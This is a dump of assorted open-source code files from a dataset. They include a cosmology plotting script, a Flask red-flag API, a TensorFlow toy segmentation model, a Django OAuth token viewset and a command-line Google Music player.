'CancerLike':0.01,\n 'DiseaseSuffixes':0.01,\n 'DiseasePrefixes':0.01,\n 'Induced':0.01,\n 'Vitamin':0.01,\n 'Acid':0.01,\n 'OtherPOS':0.01,\n 'StopWords':0.01,\n 'CommonOther':0.01,\n 'Punctuation':0.01,\n 'PossessivePhrase':0.01,\n 'HyphenatedPrefix':0.01,\n 'PostHyphen':0.85,\n 'ExtractedPhrase':0.85\n}","sub_path":"Src/Constants.py","file_name":"Constants.py","file_ext":"py","file_size_in_byte":21922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"532872851","text":"#!/usr/bin/env python3\n#\n# Plots the power spectra and Fourier-space biases for the HI.\n#\nimport warnings\nfrom mpi4py import MPI\nrank = MPI.COMM_WORLD.rank\n#warnings.filterwarnings(\"ignore\") \nif rank!=0: warnings.filterwarnings(\"ignore\")\n\n\nimport numpy as np\nimport os, sys\nimport matplotlib.pyplot as plt\nfrom pmesh.pm import ParticleMesh\nfrom scipy.interpolate import InterpolatedUnivariateSpline as ius\nfrom nbodykit.lab import BigFileMesh, BigFileCatalog, FFTPower\nfrom nbodykit.cosmology import Planck15, EHPower, Cosmology\n\nsys.path.append('../utils/')\nsys.path.append('../recon/')\nsys.path.append('../recon/cosmo4d/')\nfrom lab import mapbias as mapp\nfrom lab import mapnoise as mapn\n\nfrom lab import report as rp\nfrom lab import dg\nfrom getbiasparams import getbias\nimport tools\n#\n\nfrom matplotlib import rc, rcParams, font_manager\nrcParams['font.family'] = 'serif'\nfsize = 12\nfontmanage = font_manager.FontProperties(family='serif', style='normal',\n size=fsize, weight='normal', stretch='normal')\nfont = {'family': fontmanage.get_family()[0],\n 'style': fontmanage.get_style(),\n 'weight': fontmanage.get_weight(),\n 'size': fontmanage.get_size(),\n }\n\n\n\n#\nimport argparse\n#parser.add_argument('-m', '--model', help='model name to use')\nparser = 
argparse.ArgumentParser()\nparser.add_argument('-l', '--bs', help='boxsize', default=1024, type=float)\nparser.add_argument('-n', '--nmesh', help='nmesh', default=256, type=int)\n\nargs = parser.parse_args()\n\nfigpath = './figs/'\n\nbs, nc = args.bs, args.nmesh\npm = ParticleMesh(BoxSize=bs, Nmesh=[nc, nc, nc])\nrank = pm.comm.rank\n\n\n################\ndef make_rep_plot():\n \"\"\"Does the work of making the real-space xi(r) and b(r) figure.\"\"\"\n \n \n fig, axar = plt.subplots(1, 2, figsize=(9, 4), sharex=True)\n\n #fits\n linestyle=['-', '--']\n colors=['C%d'%i for i in range(7)]\n lww = 2\n \n wopt = 'opt'\n thopt = 'reas'\n lss = '-'\n for ia, aa in enumerate([0.2000]):\n zz = 1/aa-1\n for ik, kmin in enumerate([0.001, 0.01, 0.03, 0.05]):\n cc = colors[ik]\n angle = np.round(mapn.wedge(zz, att=wopt, angle=True), 0)\n #dpath = '/global/cscratch1/sd/chmodi/m3127/21cm_cleaning/recon/fastpm_%0.4f/wedge_kmin%0.2f_ang%0.1f/'%(aa, 0.03, angle)\n dpath = '/global/cscratch1/sd/chmodi/m3127/21cm_cleaning/recon/fastpm_%0.4f/wedge_kmin%0.2f_%s/'%(aa, kmin, wopt)\n dpath += 'L%04d-N%04d-R//thermal-%s-hex/ZA/opt_s999_h1massA_fourier_rsdpos/'%(bs, nc, thopt)\n datapp = mapp.Observable.load(dpath+'/datap')\n bpaths = [dpath+'%d-0.00//best-fit'%nc] + [dpath + '%d-0.00//%04d/fit_p/'%(nc,i) for i in range(100, 30, -20)]\n for path in bpaths:\n if os.path.isdir(path): \n break\n if rank == 0: print(path)\n bfit = mapp.Observable.load(path)\n rpfit = rp.evaluate1(bfit, datapp, field='mapp')[:-2]\n lbl = '$k_\\parallel = %.2f$'%kmin\n axar[0].plot(rpfit[0]['k'], rpfit[0]['power']/(rpfit[1]['power']*rpfit[2]['power'])**0.5, ls=lss, lw=lww, color=cc, label=lbl)\n axar[1].plot(rpfit[0]['k'], (rpfit[1]['power']/rpfit[2]['power'])**0.5, ls=lss, lw=lww, color=cc)\n\n\n ik += 1\n cc = colors[ik]\n dpath = '/global/cscratch1/sd/chmodi/m3127/21cm_cleaning/recon/fastpm_%0.4f/wedge_kmin%0.2f_ang%0.2f/'%(aa, 0, 0)\n dpath += 'L%04d-N%04d-R//thermal-%s-hex/ZA/opt_s999_h1massA_fourier_rsdpos/'%(bs, nc, thopt)\n datapp = mapp.Observable.load(dpath+'/datap')\n bpaths = [dpath+'%d-0.00//best-fit'%nc] + [dpath + '%d-0.00//%04d/fit_p/'%(nc,i) for i in range(100, 30, -20)]\n for path in bpaths:\n if os.path.isdir(path): \n break\n if rank == 0: print(path)\n bfit = mapp.Observable.load(path)\n rpfit = rp.evaluate1(bfit, datapp, field='mapp')[:-2]\n lbl = 'All modes'\n axar[0].plot(rpfit[0]['k'], rpfit[0]['power']/(rpfit[1]['power']*rpfit[2]['power'])**0.5, ls='--', lw=lww, color=cc, label=lbl)\n axar[1].plot(rpfit[0]['k'], (rpfit[1]['power']/rpfit[2]['power'])**0.5, ls='--', lw=lww, color=cc)\n\n axis = axar[0]\n axis.set_ylabel('$r_{cc}$', fontdict=font)\n axis.set_ylim(-0.05, 1.1)\n #for axis in axar[:, 1]: axis.set_ylabel(r'$\\sqrt{P_{\\rm mod}/P_{hh}}$', fontdict=font)\n axis = axar[1]\n axis.set_ylabel(r'$T_f$', fontdict=font)\n axis.set_ylim(-0.05, 2)\n for axis in axar[:]: axis.set_xlabel(r'$k\\quad [h\\,{\\rm Mpc}^{-1}]$', fontdict=font)\n for axis in axar.flatten():\n axis.axhline(1, color='k', ls=':')\n axis.set_xscale('log')\n axis.grid(which='both', lw=0.2, alpha=0.2, color='gray')\n axis.legend(prop=fontmanage)\n\n # Put on some more labels.\n for axis in axar.flatten():\n for tick in axis.xaxis.get_major_ticks():\n tick.label.set_fontproperties(fontmanage)\n for tick in axis.yaxis.get_major_ticks():\n tick.label.set_fontproperties(fontmanage)\n ##and finish\n plt.tight_layout(rect=[0, 0, 1, 0.95])\n if rank == 0: plt.savefig(figpath + '/kmin_L%04d-hex.pdf'%(bs))\n\n\n\n################\n\n\nif 
__name__==\"__main__\":\n make_rep_plot()\n #\n","sub_path":"code/plotting/plot_compare_kmin.py","file_name":"plot_compare_kmin.py","file_ext":"py","file_size_in_byte":5215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"200251679","text":"file = open(\"AER_urls.txt\")\nurls = []\n# newlist = []\nfor line in file:\n if 'www' in line:\n urls.append(line.strip())\nfile.close()\nfor item in urls:\n with open('AER_papers_url.txt','a') as f:\n f.write(str(item)+'\\n')\nprint('Done')\n","sub_path":"Spider_AER_3_CheckEveryUrl.py","file_name":"Spider_AER_3_CheckEveryUrl.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"627595211","text":"from flask import Flask, Blueprint, jsonify, json, request\nfrom datetime import datetime\nfrom functools import wraps\nfrom app.models import User,USERS,FLAGS,Redflag\nfrom uuid import uuid4\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom .users import loggedinuser\n\nflags = Blueprint('flag', __name__)\n\n\n@flags.route(\"/api/v1/create_redflag\", methods=['POST'])\ndef create_redflag():\n\n try:\n if request.content_type != 'application/json':\n return jsonify({'Bad request': 'Content-type must be in json'}), 400\n\n request_data = request.get_json()\n\n if not request_data:\n return jsonify({\"Failed\": \"Request can't be empty\"}), 400\n\n global loggedinuser\n global FLAGS\n\n if len(loggedinuser) == 0:\n # unauthorized access\n return jsonify({'message': 'please login to create a flag'}), 401\n\n if 'type' not in request_data.keys():\n # bad request\n return jsonify({'message': 'Flag type is missing'}), 400\n else:\n type = request_data['type']\n\n if 'location' not in request_data.keys():\n # bad request\n return jsonify({'message': 'location is missing'}), 400\n else:\n location = request_data['location']\n\n if 'description' not in request_data.keys():\n # bad request\n return jsonify({'message': 'description is missing'}), 400\n if len(request_data['description']) < 20:\n # bad request\n return jsonify({'message': 'description should be well defined'}), 400\n\n else:\n description = request_data['description']\n \n data={\n \"flag_id\": str(uuid4()),\n \"type\":type,\n \"location\":location,\n \"description\":description\n }\n loggedinuser.append(data)\n return jsonify({'message': 'flag successfully created', 'flags':loggedinuser}), 201\n\n except KeyError as item:\n return jsonify({'message': str(item) + ' is missing'}), 400\n\n# only viewed by admin through the admin access\n\n\n@flags.route('/api/v1/redflag', methods=['GET'])\ndef get():\n \"\"\"Function that returns all registered flags\"\"\"\n global loggedinuser\n\n if not loggedinuser:\n return jsonify({'message': 'No records found'}), 404 # not found\n else:\n return jsonify({'flags': loggedinuser}), 200\n\n\n@flags.route('/api/v1/redflag/<flag_id>', methods=['GET'])\ndef get_specific_flag(flag_id):\n \"\"\" function to retrieve a single flag by id\"\"\"\n global loggedinuser\n\n ","sub_path":"app/views/redflag.py","file_name":"redflag.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"181314521","text":"import tensorflow as tf\nimport numpy as np\nimport os\nimport re\nimport matplotlib.pyplot as plt\nimport sys\nfrom 
PIL import Image\nimport skimage.transform as ski\n\ndef rgb2gray(rgb):\n\n r, g, b = rgb[:,:,0], rgb[:,:,1], rgb[:,:,2]\n gray = 0.2989 * r + 0.5870 * g + 0.1140 * b\n\n return gray\n\ndef load_data(rootDir, maxNum = 2000, isResize = True):\n\tXtrain = []\n\tind = 0\n\tfor root, dirs, files in os.walk(rootDir):\n\t\tfor fileName in files:\n\t\t\t# print(filename)\n\t\t\tmatch = re.search(r'.*.jpg', fileName)\n\t\t\tif match:\n\t\t\t\timg = plt.imread(os.path.join(root, fileName))\n\t\t\t\tif len(np.shape(img)) > 2:\n\t\t\t\t\timg = rgb2gray(np.array(img))\n\t\t\t\timg = img / 255 #normalize\n\t\t\t\tif isResize:\n\t\t\t\t\timg = ski.resize(img, [64,64])\n\t\t\t\tXtrain.append(img)\n\t\t\t\tind += 1\n\t\t\t\tif ind >= maxNum:\n\t\t\t\t\treturn Xtrain\n\treturn Xtrain\n\ndef load_labels(rootDir, maxNum = 2000, isResize = True):\n\tytrain = []\n\tind = 0\n\tfor root, dirs, files in os.walk(rootDir):\n\t\tfor fileName in files:\n\t\t\t# print(filename)\n\t\t\tmatch = re.search(r'.*.jpg', fileName)\n\t\t\tif match:\n\t\t\t\timg = plt.imread(os.path.join(root, fileName))\n\t\t\t\timg = img/255 # normalize\n\t\t\t\tif isResize:\n\t\t\t\t\timg = ski.resize(img, [64,64])\n\t\t\t\tclassImg = np.zeros(np.shape(img))\n\t\t\t\tclassImg[img >= 0.5] = 1 # binary image\n\t\t\t\tytrain.append(classImg)\n\t\t\t\tind += 1\n\t\t\t\tif ind >= maxNum:\n\t\t\t\t\treturn ytrain\n\treturn ytrain\n\nprint('start load data ')\ndata = load_data(os.path.realpath(__file__ + \"/../\" + 'toy_segmentaion_data/data'))\nprint(np.shape(data))\n\nlabel = load_labels(os.path.realpath(__file__ + \"/../\" + 'toy_segmentaion_data/labels'))\nprint(np.shape(label))\nprint('end load data ')\n\ntrain_num = 1000\nval_num = 1500\ntest_num = 500\n\ntrain_dataset = data[:train_num]\ntrain_labels = label[:train_num]\nvalid_dataset = data[train_num:val_num]\nvalid_labels = label[train_num:val_num]\ntest_dataset = data[val_num:]\ntest_labels = label[val_num:]\n\nprint('Training set', np.shape(train_dataset), np.shape(train_labels))\nprint('Validation set', np.shape(valid_dataset), np.shape(valid_labels))\nprint('Test set', np.shape(test_dataset), np.shape(test_labels))\n\nplt.imshow(data[0], cmap='gray')\nplt.show()\nplt.imshow(label[0], cmap='gray')\nplt.show()\n\n\nimage_size = 64\nnum_labels = 1\nnum_channels = 1 # grayscale\n\ndef accuracy(predictions, labels):\n\tpredict_matrix = np.zeros(np.size(predictions))\n\tpredict_matrix[predictions > np.mean(predictions)] = 1\n\ttmp = np.equal(np.argmax(predictions, 3), np.argmax(labels, 3))\n\treturn np.mean(tmp)\n\t# return (100.0 * np.sum(np.argmax(predictions, 3) == np.argmax(labels, 3))\n # / image_size*image_size)\n\n\nbatch_size = 32\nkernel_size = 7\ndepth = 32\n\ngraph = tf.Graph()\n\nwith graph.as_default():\n X = tf.placeholder(dtype=tf.float32,shape=[batch_size, image_size, image_size, num_channels])\n y = tf.placeholder(dtype=tf.float32, shape=[batch_size, image_size, image_size, num_labels])\n\n train_dataset = np.reshape(train_dataset, [-1, image_size, image_size, num_channels]).astype(np.float32)\n train_labels = np.reshape(train_labels, [-1, image_size, image_size, num_labels]).astype(np.float32)\n valid_labels = np.reshape(valid_labels, [-1, image_size, image_size, num_labels]).astype(np.float32)\n test_labels = np.reshape(test_labels, [-1, image_size, image_size, num_labels]).astype(np.float32)\n\n valid_dataset = np.reshape(valid_dataset, [-1, image_size, image_size, num_channels]).astype(np.float32)\n test_dataset = np.reshape(test_dataset, [-1, image_size, image_size, 
num_channels]).astype(np.float32)\n\n tf_valid_dataset = tf.constant(valid_dataset,dtype=tf.float32)\n tf_test_dataset = tf.constant(test_dataset,dtype=tf.float32)\n\n # Variables:\n # Different dimensions for the max_pooling ....\n\n W1 = tf.Variable(tf.truncated_normal(\n [kernel_size, kernel_size, num_channels, depth], stddev=0.1), name='W1')\n b1 = tf.Variable(tf.zeros([depth]), name='b1')\n\n W2 = tf.Variable(tf.truncated_normal(\n [kernel_size, kernel_size, depth, depth*2], stddev=0.1), name='W2')\n b2 = tf.Variable(tf.constant(1.0, shape=[depth*2]), name='b2')\n\n W3 = tf.Variable(tf.truncated_normal(\n\t [2, 2, depth, depth * 2], stddev=0.1),name='W3',dtype=tf.float32)\n b3 = tf.Variable(tf.constant(1.0, shape=[depth]),name='b3',dtype=tf.float32)\n\n W4 = tf.Variable(tf.truncated_normal(\n\t [2, 2, depth, depth], stddev=0.1), name='W4',dtype=tf.float32)\n b4 = tf.Variable(tf.constant(1.0, shape=[depth]), name='b4',dtype=tf.float32)\n\n W5 = tf.Variable(tf.truncated_normal(\n\t [1, 1, depth, num_labels], stddev=0.1), name='W5',dtype=tf.float32)\n b5 = tf.Variable(tf.constant(1.0, shape=[num_labels]), name='b5',dtype=tf.float32)\n\n # Model.\n def model(data):\n '''\n Model:\n conv-relu-max_pool(2x2)-conv-relu-max_pool(2x2)-relu-drop_out-FC\n Accuracy of 93%\n '''\n conv_1 = tf.nn.conv2d(data, W1, [1, 1, 1, 1], padding='SAME') # shape [batch_size, image_size, image_size, depth]\n relu_1 = tf.nn.relu(conv_1 + b1)\n max_pool_1 = tf.nn.max_pool(relu_1, [1,2,2,1], [1,2,2,1], padding='SAME') # shape [batch_size, image_size/2, image_size/2, depth]\n\n conv_2 = tf.nn.conv2d(max_pool_1, W2, [1, 1, 1, 1], padding='SAME')\n relu_2 = tf.nn.relu(conv_2 + b2)\n max_pool_2 = tf.nn.max_pool(relu_2, [1,2,2,1], [1,2,2,1], padding='SAME') # shape [batch_size, image_size/4, image_size/4, depth*2]\n\n # upsample\n # x_shape = tf.shape(x)\n # output_shape = tf.stack([x_shape[0], x_shape[1] * 2, x_shape[2] * 2, x_shape[3] // 2])\n max_pool_2_shape = max_pool_2.get_shape().as_list()\n out_shape = tf.stack([max_pool_2_shape[0], max_pool_2_shape[1]*2, max_pool_2_shape[2]*2, max_pool_2_shape[3]//2])\n # [batch_size, image_size//2, image_size//2, depth]\n deconv_1 = tf.nn.conv2d_transpose(value=max_pool_2,filter=W3, output_shape=out_shape, strides=[1,2,2,1])\n relu_3 = tf.nn.relu(deconv_1 + b3)\n\n relu_3_shape = relu_3.get_shape().as_list()\n out_shape = tf.stack([relu_3_shape[0], relu_3_shape[1] * 2, relu_3_shape[2] * 2, relu_3_shape[3]])\n # [batch_size, image_size, image_size, num_labels]\n deconv_2=tf.nn.conv2d_transpose(value=relu_3,filter=W4, output_shape=out_shape ,strides=[1,2,2,1]) # output size [batch_size, image_size, image_size, num_labels]\n relu_4 = tf.nn.relu(deconv_2 + b4)\n\n return tf.nn.relu(tf.nn.conv2d(relu_4, W5, [1, 1, 1, 1], padding='SAME') + b5)\n\n\n# Train\n logits = model(X)\n loss_train = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=logits))\n\n optimizer = tf.train.GradientDescentOptimizer(0.1).minimize(loss_train)\n\n train_prediction = tf.nn.softmax(logits)\n valid_prediction = tf.nn.softmax(model(tf_valid_dataset))\n test_prediction = tf.nn.softmax(model(tf_test_dataset))\n\n num_steps = 300\n\n with tf.Session(graph=graph) as session:\n tf.global_variables_initializer().run()\n print('Initialized')\n for step in range(num_steps):\n ind = np.random.randint(0, train_num-1, batch_size)\n batch_data = train_dataset[ind, :, :]\n batch_labels = train_labels[ind, :]\n feed_dict = {X: batch_data, y: batch_labels}\n _, l, predictions = session.run(\n 
[optimizer, loss_train, train_prediction], feed_dict=feed_dict)\n if (step % 50 == 0):\n print('Minibatch loss at step %d: %f' % (step, l))\n print('Minibatch accuracy: %.3f%%' % accuracy(predictions, batch_labels))\n prediction = valid_prediction.eval()\n print('Validation accuracy: %.3f%%' % accuracy(prediction, valid_labels))\n f, (ax1, ax2) = plt.subplots(2)\n ax1.imshow(valid_labels[0][:, :, 0], cmap='gray')\n ax1.set_title('ground truth:')\n tmp0 = prediction[0]\n res = np.zeros(np.shape(tmp0))\n res[tmp0 >= np.mean(tmp0)] = 1\n ax2.imshow(res, cmap='gray')\n ax2.set_title('prediction: class 0: figure')\n plt.show()\n\n print('Test accuracy: %.3f%%' % accuracy(test_prediction.eval(), test_labels))\n\n\n\n","sub_path":"ProjectSrc/ExternalModules/toy_data_segmentaion_model_2.py","file_name":"toy_data_segmentaion_model_2.py","file_ext":"py","file_size_in_byte":8253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"556026285","text":"from datetime import timedelta\nfrom django.utils import timezone\nfrom rest_framework import viewsets, permissions, mixins\n\nimport requests\n\nfrom oauth.models import OauthClient, Token\nfrom oauth.serializers import OauthClientSerializer, TokenSerializer\nfrom oauth.permissions import TokenPermission\nfrom common import responses\n\n# Create your views here.\n\n\nclass OauthClientViewSet(viewsets.ReadOnlyModelViewSet):\n lookup_field = 'name'\n queryset = OauthClient.objects.all()\n serializer_class = OauthClientSerializer\n permission_classes = (permissions.IsAuthenticated,)\n\n\nclass TokenViewSet(mixins.CreateModelMixin, mixins.ListModelMixin,\n mixins.RetrieveModelMixin, mixins.DestroyModelMixin,\n viewsets.GenericViewSet):\n queryset = Token.objects.all()\n serializer_class = TokenSerializer\n permission_classes = (TokenPermission,)\n\n APP_USER_AGENT = 'kass test app by /u/swampfire100'\n HEADERS = {'User-agent': APP_USER_AGENT}\n\n def create(self, request, *args, **kwargs):\n \"\"\"\n Create a token using the given code and associates it with the given oauth_client and user\n\n :param request:\n :param args:\n :param kwargs:\n :return:\n \"\"\"\n user = request.user\n try:\n code = request.data.get('code')\n oauth_client = request.data.get('oauth_client')\n\n # actually get the oauth_client object\n # Can take either name or id\n try:\n oauth_client = OauthClient.objects.get(id=int(oauth_client))\n except ValueError:\n oauth_client = OauthClient.objects.get(name=oauth_client)\n\n if None in (code, oauth_client):\n raise ValueError(request.data)\n\n payload = {\n 'grant_type': 'authorization_code', # OAuth 2.0 specification\n 'code': code,\n 'redirect_uri': oauth_client.redirect_uri\n }\n\n auth = None\n\n if oauth_client.authorize_using_header:\n auth = (oauth_client.client_id, oauth_client.client_secret)\n\n else:\n payload['client_id'] = oauth_client.client_id\n payload['client_secret'] = oauth_client.client_secret\n\n r = requests.post(oauth_client.token_url, payload, auth=auth, headers=self.HEADERS)\n\n if r.status_code == 200:\n # Painful debugging note: Yea... 
it returns a tuple.\n token, created = Token.objects.update_or_create(user=user, oauth_client=oauth_client,\n defaults=r.json())\n serializer = TokenSerializer(token)\n\n return responses.data_response(serializer.data)\n else:\n raise ValueError('failed get token request')\n\n except OauthClient.DoesNotExist:\n return responses.error_response('Invalid oauth_client_id.')\n except ValueError:\n return responses.INVALID_DATA_RESPONSE\n\n def list(self, request, *args, **kwargs):\n \"\"\"\n Lists all the tokens owned by the user\n\n :param request:\n :param args:\n :param kwargs:\n :return:\n \"\"\"\n\n tokens = Token.objects.filter(user=request.user)\n self._replace_expired_tokens(tokens)\n serializer = TokenSerializer(tokens, many=True)\n return responses.data_response(serializer.data)\n\n def retrieve(self, request, *args, **kwargs):\n token = self.get_object()\n try:\n self._replace_expired_token(token)\n serializer = self.get_serializer(token)\n return responses.data_response(serializer.data)\n except ValueError as e:\n token.delete()\n return responses.error_response(str(e))\n\n def destroy(self, request, *args, **kwargs):\n token = self.get_object()\n oauth_client = token.oauth_client\n access_token = token.access_token\n token.delete()\n\n # Process is not uniform across different companies\n if oauth_client.name == 'reddit':\n auth = (oauth_client.client_id, oauth_client.client_secret)\n data = {'token': access_token}\n\n r = requests.post(oauth_client.revoke_url, data, auth=auth, headers=self.HEADERS)\n if r.status_code < 300:\n return responses.success_response('Token deleted.')\n else:\n return responses.error_response('Revoke token error.')\n\n def _replace_expired_tokens(self, tokens):\n \"\"\"\n Loop through each token and refresh it if necessary.\n\n :param tokens:\n :return:\n \"\"\"\n\n for token in tokens:\n try:\n self._replace_expired_token(token)\n except ValueError:\n # get rid of the token if it was unable to be refreshed\n token.delete()\n\n def _replace_expired_token(self, token):\n if token.is_expired():\n oauth_client = token.oauth_client\n # get new token\n payload = {\n 'refresh_token': token.refresh_token,\n 'grant_type': 'refresh_token' # OAuth 2.0 specification\n }\n\n # might need to configure steps for different companies\n auth = None\n if oauth_client.authorize_using_header:\n auth = (oauth_client.client_id, oauth_client.client_secret)\n\n else:\n payload['client_id'] = oauth_client.client_id\n payload['client_secret'] = oauth_client.client_secret\n\n r = requests.post(oauth_client.token_url, payload, auth=auth, headers=self.HEADERS)\n\n if r.status_code == 200:\n data = r.json()\n token.created = timezone.now()\n token.access_token = data.get('access_token')\n token.expires_in = data.get('expires_in')\n token.token_type = data.get('token_type')\n token.scope = data.get('scope', None)\n token.save()\n else:\n raise ValueError('Failed to refresh token.')\n","sub_path":"oauth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"105643927","text":"#!/usr/bin/env python2\nimport os\nimport gi\nimport sys\nimport glib\nimport thread\nimport random\nimport readline\nimport gmusicapi\nimport unicodedata\nfrom time import sleep\nfrom getpass import getpass\n\ngi.require_version('Gst', '1.0')\nfrom gi.repository import GObject, Gst\n\nGObject.threads_init()\nglib.threads_init()\nGst.init(None)\n\nMESSAGE_TIMEOUT = 3 # seconds\n\ndef 
strip_accents(s):\n nrm = ''.join(c for c in unicodedata.normalize('NFD', s) \n if unicodedata.category(c) != 'Mn')\n return nrm\n\nclass GetchUnix:\n \"\"\"Implements getch for unix systems. Thanks StackOverflow.\"\"\"\n def __init__(self):\n import tty, sys\n\n def __call__(self):\n import sys, tty, termios\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\n\nclass StreamPlayer:\n \"\"\"Handles the control of playbin2 from the Gst library.\"\"\"\n def __init__(self, main_player):\n self._player = Gst.ElementFactory.make(\"playbin\") # \"player\" or None\n # self.playing = False\n # self.stop()\n\n def change_song(self, URI):\n self.stop()\n self._player.set_property('uri', URI)\n self.play()\n\n def play(self):\n self.playing = True\n self._player.set_state(Gst.State.PLAYING)\n\n def pause(self):\n self.playing = False\n self._player.set_state(Gst.State.PAUSED)\n\n def toggle(self):\n if self.playing:\n self.pause()\n else:\n self.play()\n\n def stop(self):\n self.playing = False\n self._player.set_state(Gst.State.NULL)\n\n\ndef notify(txt):\n print(txt)\n\n\ndef term_width():\n import os\n rows, columns = os.popen('stty size', 'r').read().split()\n return columns\n\n\ndef get_device_id(username, password):\n \"\"\"Handles retrieving an android device ID to enable streaming.\"\"\"\n if os.path.exists(\"./device_id\"):\n with open(\"device_id\") as id_file:\n device_id = id_file.read().strip()\n return device_id\n else:\n api = gmusicapi.Webclient()\n api.login(username, password)\n devices = api.get_registered_devices()\n for device in devices:\n if device['type'] == 'PHONE':\n device_id = str(device['id'])[2:]\n # cache the id so later runs can skip the web lookup\n with open(\"device_id\", \"w\") as id_file:\n id_file.write(device_id)\n return device_id\n\n\nclass TextMenu:\n def __init__(self, list_items):\n self.list_items = list_items\n def show(self):\n for i, s in enumerate(self.list_items):\n orig_data = [s['title'], s['artist'], s['album']]\n data = [str(strip_accents(tag)) for tag in orig_data]\n print(\"{}. 
{} - {} - {}\".format(str(i+1), *data))\n while True:\n try:\n return self.list_items[int(raw_input(\"Choice: \")) - 1]\n except ValueError:\n continue\n\n\nclass Player:\n def __init__(self, username, password):\n self.device_id = get_device_id(username, password)\n self.username = username\n self.password = password\n self.api = gmusicapi.Mobileclient()\n self.logged_in = self.api_login()\n self.stream_player = StreamPlayer(self)\n self.stream_player.play()\n self.paused = False\n self.playlist = []\n self.pl_pos = 0\n if self.logged_in:\n print(\"Logged in successfully!\")\n else:\n print(\"Login failed.\")\n quit()\n self.get_random_song()\n\n def player_thread(self):\n bus = self.stream_player._player.get_bus()\n try:\n bus.add_signal_watch()\n bus.connect(\"message\", self.handle_song_end)\n except:\n print(\"Big thing\")\n glib.MainLoop().run()\n\n def beginloop(self):\n self.play_song()\n thread.start_new_thread(self.player_thread, ())\n \n while True:\n os.system('setterm -cursor off')\n self.display_song()\n user_key = getch()\n if user_key == \" \":\n self.paused = not self.paused\n self.stream_player.toggle()\n elif user_key == \"z\":\n self.get_random_song()\n self.pl_pos += 1\n self.play_song()\n elif user_key == \">\":\n self.next_song()\n elif user_key == \"<\":\n self.previous_song()\n elif user_key == \"Q\":\n break\n elif user_key == \"a\":\n self.search_library(\"add\")\n elif user_key == \"s\":\n self.search_library(\"play\")\n elif user_key == \"c\":\n self.clear_playlist()\n\n\n def clear_playlist(self):\n self.playlist = [self.song]\n self.pl_pos = 0\n\n def handle_song_end(self, bus, message):\n if message.type == Gst.MessageType.EOS:\n self.next_song()\n self.display_song() # refresh\n\n def next_song(self):\n self.pl_pos += 1\n try:\n self.song = self.playlist[self.pl_pos]\n self.play_song()\n except IndexError:\n self.pl_pos -= 1\n\n def previous_song(self):\n if self.pl_pos > 0:\n self.pl_pos -= 1\n self.song = self.playlist[self.pl_pos]\n self.play_song()\n\n def search_library(self, action=\"play\"):\n try:\n # Screw x-compatibility.\n os.system('setterm -cursor on')\n search_text = raw_input(\"\\nSearch: \")\n os.system('setterm -cursor off')\n except (EOFError, KeyboardInterrupt):\n return\n matching_songs = []\n for song in self.api.get_all_songs():\n if any([search_text.lower() in song['title'].lower(),\n search_text.lower() in song['artist'].lower(),\n # search_text.lower() in song['album'].lower()s\n ]):\n matching_songs.append(song)\n \n if not matching_songs:\n sys.stdout.write(\"\\rNo results found. \")\n sys.stdout.flush()\n sleep(MESSAGE_TIMEOUT)\n return\n self.playlist.append(TextMenu(matching_songs).show())\n if action == \"play\":\n self.song = self.playlist[-1]\n self.pl_pos = len(self.playlist) - 1\n self.play_song()\n # self.song = matching_songs[1]\n # self.play_song()\n\n def search_all_access(self):\n try:\n # Screw x-compatibility.\n os.system('setterm -cursor on')\n search_text = raw_input(\"\\nSearch: \")\n os.system('setterm -cursor off')\n except (EOFError, KeyboardInterrupt):\n return\n matching_songs = self.api.search_all_access(search_text)\n if not matching_songs:\n sys.stdout.write(\"\\rNo results found. 
\")\n sys.stdout.flush()\n sleep(MESSAGE_TIMEOUT)\n return\n self.playlist.append(TextMenu(matching_songs).show()) # FIXME\n # self.song = matching_songs[1]\n # self.play_song()\n\n\n def display_song(self):\n if not self.paused:\n try:\n s = unicode(\"\\r[Playing] {s[title]} by {s[artist]}\".format(\n s=self.song))\n except UnicodeEncodeError:\n global strip_accents\n # Don't remove this, I know it doesn't make sense but the code\n # breaks without it there. \n s = \"\\r[Playing] {} by {}\".format(\n strip_accents(self.song['title']),\n strip_accents(self.song['artist']))\n else:\n try:\n s = unicode(\"\\r[Paused] {s[title]} by {s[artist]}\".format(\n s=self.song))\n except UnicodeEncodeError:\n import unicodedata\n def strip_accents(s):\n return ''.join(c for c in unicodedata.normalize('NFD', s) \n if unicodedata.category(c) != 'Mn')\n s = \"\\r[Paused] {} by {}\".format(\n strip_accents(self.song['title']),\n strip_accents(self.song['artist']))\n s += \" \" * (int(term_width()) - len(s) - 1)\n sys.stdout.write(s)\n sys.stdout.flush()\n\n\n def api_login(self):\n return self.api.login(self.username, self.password)\n\n def play_url(self, stream_url):\n self.stream_player.change_song(stream_url)\n self.stream_player.play()\n\n def get_random_song(self):\n all_songs = self.api.get_all_songs()\n self.song = random.choice(all_songs)\n self.playlist.append(self.song)\n\n def play_song(self):\n song_url = self.api.get_stream_url(self.song['id'], self.device_id)\n self.play_url(song_url)\n\n\ndef disable_warnings():\n import requests.packages.urllib3 as urllib3\n urllib3.disable_warnings()\n\n\ndef main():\n disable_warnings()\n while True:\n username = raw_input(\"Username: \")\n # # notify(\"A password is required to use Google Music.\")\n password = getpass()\n try:\n player = Player(username, password)\n player.beginloop()\n except gmusicapi.exceptions.NotLoggedIn:\n print(\"Login details were incorrect or Google blocked a login \" +\n \"attempt. Please check your email.\")\n else:\n break\n os.system('setterm -cursor on')\n print\n\n\nif __name__ == \"__main__\":\n # Implement single-character grabbing from stdin.\n try:\n from msvcrt import getch\n except ImportError:\n getch = GetchUnix()\n try:\n main()\n except Exception:\n 